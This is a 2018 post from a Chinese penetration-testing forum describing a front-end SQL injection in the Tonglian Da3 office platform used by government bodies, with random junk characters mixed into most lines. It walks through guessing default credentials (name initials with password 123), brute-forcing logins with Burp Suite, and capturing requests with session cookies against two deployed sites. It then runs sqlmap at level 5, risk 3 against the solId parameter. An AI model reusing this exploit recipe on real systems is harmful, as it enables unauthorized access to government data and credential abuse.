中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]
作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

' Z9 u& P' ^! \. }
( s/ u% Y4 }( m! z0 N

7 }, a! j5 Q$ v+ z6 C: R

' p7 H! {5 p+ r1 j6 A) F0 a" \5 s 平台简介:, O( t7 k9 _6 D6 }- m& r8 J: K

u! c3 a/ W+ T% d

- G( k3 c/ O4 R+ _) ?' v8 A3 e L$ U   7 c0 e# M3 X$ r' ~' o

& K* q0 U) y$ G1 |9 k* S

6 f+ O+ o3 D9 e 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' P0 k: T% n% R- P( n, _同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; ?) u+ J: G. [9 t- B+ H+ D 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" P4 V+ X9 ~9 n2 M

4 h G! ?8 @; m1 N! c

* f$ y* h" c F: F  7 k: i; b3 G+ E! T) a4 l

) [! g( n g7 C/ Q* f) u O, ?

: I( h4 u1 Q, @" ]. z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:1 z+ O$ U8 b( x8 U

# w9 E. _1 N: N% n: e

0 k4 N- w: `8 ^: n3 L   h" i/ {4 }4 u! S

* X" m( V- Y) \. z

8 ~4 K9 n# M { http://1.1.1.1:7197/cap-aco/#(案例2-) ( u: ^, E |- \: H4 L

' L2 a/ ]1 N) x

1 H/ k+ ]( q8 R! p# i http://www.XXOO.com (案例1-官网网站) 8 p, ~1 `1 w J7 U- |2 i& V0 u

& Y8 p" m& k$ s2 y9 ^1 x2 _5 V

+ X' u$ X6 F1 _' x% \7 Y  , Q/ y1 x: Z" f+ @! m6 m3 c4 S2 Z; v

7 _' S7 P3 U( u" T' j6 F

* h# ^# W( ?2 c+ q/ ]$ \; J 漏洞详情:# T4 j: C! B8 V0 ]/ f. P

' I- I+ P* {4 |

' v4 _- F1 S, \3 d: H  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试( G8 i' ?. M9 l. _$ M+ K

- ]0 n& A. E9 @! i

5 W \' Y/ Y8 J5 G5 I      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: ! L* z: l# \% \: f' C

( M" D3 h: G" {1 q6 Y

. w' u$ T0 k5 O! `$ ?. ~+ B   2 i8 P( L7 d. W

7 x/ j5 C j0 a

1 T" V; _! f2 k8 u& z8 b9 s9 K  6 ~' L0 R/ z/ w' d

* |: H# H0 d! O6 b& Y8 a4 G& X

# Q7 z2 x' [1 c7 E status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 j! R3 l/ M3 P5 C; i$ q2 H) B+ S. Z

. O) F8 B7 ]! {9 S/ F/ {/ h

* \& O c/ @9 V' G 1、案例1-官方网站! c0 x7 g6 O# I: j: p) H

7 ~! I1 s" n( k% Z' u

9 k0 V0 f5 r- H# Y& l GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.15 |9 ^0 ]9 _1 [$ v0 S

4 x9 S; |+ `2 r: N

1 b% e% s K, z. I" j5 Z" l Host: www.XXOO.com # l& ], X0 @ {5 N& y9 Q

8 D6 N* v1 }2 H7 i; g3 d6 g/ b

5 u( ^& s* t# }9 b4 A Proxy-Connection: Keep-Alive, Z) [* \9 R. }/ K3 D- n. [$ o

/ C- j* N. S# P3 A4 j

! E9 f( q6 j8 d+ B5 Z; Z2 S9 E) B p Accept: application/json, text/javascript, */*; q=0.011 i" c& x9 {( u3 c

* ?' u6 |. z7 [# o8 s1 P5 z

4 V: I: Y7 t' W% @3 f1 m8 p4 N2 D! C/ J Accept-Language: zh-CN U# y+ E' m" y# o

7 v7 P. h9 o0 h

" e$ e/ `+ n% r+ B% e Content-Type: application/json & p p; B+ m) y" ^$ \

! t& C- _; E1 ~

6 |" a- p) d( a) @% W; R User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko& H4 b( ^/ P. V G6 V

& w _4 M1 k9 r8 D% n: a

1 t) `# ]1 o. d! ?, Y X-Requested-With: XMLHttpRequest& h' y" l0 o u6 @9 W z9 v

+ o7 M: T0 u: m7 j

; G5 x1 w* g' [# f' p Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002* L! p7 i/ K) ~. w5 m

* c; h5 W+ I R3 g* v

4 h; p& d( D/ C& K0 i Accept-Encoding: gzip, deflate, sdch, I' @" O) g0 h5 c4 ~

6 W9 L9 q3 _& t( y* i8 w2 ^

) ?+ P3 D3 b& y( e Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- @& c( ^( U! p& M

$ ]/ A' m# ^$ s1 r

1 e7 P, a& D0 { 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 P3 n" h N. V% I

) ^( M n. p( \0 l! M

) `) w' e9 T f1 h7 p7 q t   - w" d7 d0 y8 O3 R

4 @5 i( Q. g9 ^+ ?& H9 g

3 j& ^! i+ \; w- h- I% D3 C  & Z0 N! j9 P: G* I* q' V$ h1 Q

" C% C7 [3 X" t+ ]' N. F/ u

! c7 i+ `$ Y' V6 R   5 }$ z5 V% M, v( i" j p

8 X n. ]- j$ L8 ~4 q

' Q0 d0 @& a, Q* f   ; a7 P# N6 P1 [/ u5 Y" n

3 Q7 v0 z1 X! D

# Z" Y5 m# e9 {, H! q: j  5 u5 B' `; J2 Z' h' K0 `

" i; S1 P9 Z6 K6 o2 c

# _) w! C4 @+ _7 f 2、案例2-某天河云平台6 X; {2 _ `+ A, i

B) m `0 l1 H8 m. G; j

- d( c1 `3 V" c# U GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ~* x, w5 s% X7 J5 [5 h- I( ~! c# j: S

+ q+ I' f# F$ t& F( J

: E' x8 s G& s" Z( J Host: 1.1.1.:7197: a( Z# r9 K: V! P2 o

$ I& I9 L0 z9 f5 ~$ I: l R' s- H/ C) @

4 ?/ i; h; T1 s& o7 Q Accept: application/json, text/javascript, */*; q=0.01- N/ U; W# L0 h# U

' g& R. G0 N+ N$ ^' ^

* N! f) }. Z; z& o X-Requested-With: XMLHttpRequest+ K3 s% y* B& Z2 b5 h: ^2 c

# b" h5 k1 E& t7 {

3 U3 H, W, H+ s3 r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0- ~9 E' D9 B% f7 r5 P% v& g$ {

5 `; p3 ~% t) L( L7 F

6 k" S- x o4 p6 @ Content-Type: application/json p: h: d2 P0 b0 Y

: _9 v7 z p" h9 g7 S6 @; T

) {' \2 O$ a3 x3 u( u3 y Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ' q' X1 Y$ G" y) w5 {

: ^# z; p, N6 F& V

$ m e1 H* R3 G# M* @ ^ Accept-Language: zh-CN,zh;q=0.8 9 A$ H" f: n9 S9 _/ l1 K4 d

5 x- z L" d) E. v1 K$ ^

7 ?8 e$ g1 K8 h; A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 6 B; \" c- {' L$ ~) e" F5 ~

% t; @1 `$ ]5 p6 A

2 M0 ?% M5 J3 w( Y% e* J! Q9 ~' \( a Connection: close0 X" g6 n- y7 n- M: F

5 B: F, Z6 @& b l: b! Y

( ^) `0 c& _' U& w 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ; _" v4 u3 P* T

2 n* Q! V4 F1 V7 }! u8 ]" S& B* E

0 `9 h+ S& F7 a; U' r   : D6 k/ x2 G% w) S

a2 s( r) k' z

1 k8 K m+ s. ]7 v! _4 ^7 E/ {5 I5 o
1 w& v7 v, }2 Z4 v) V4 p





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2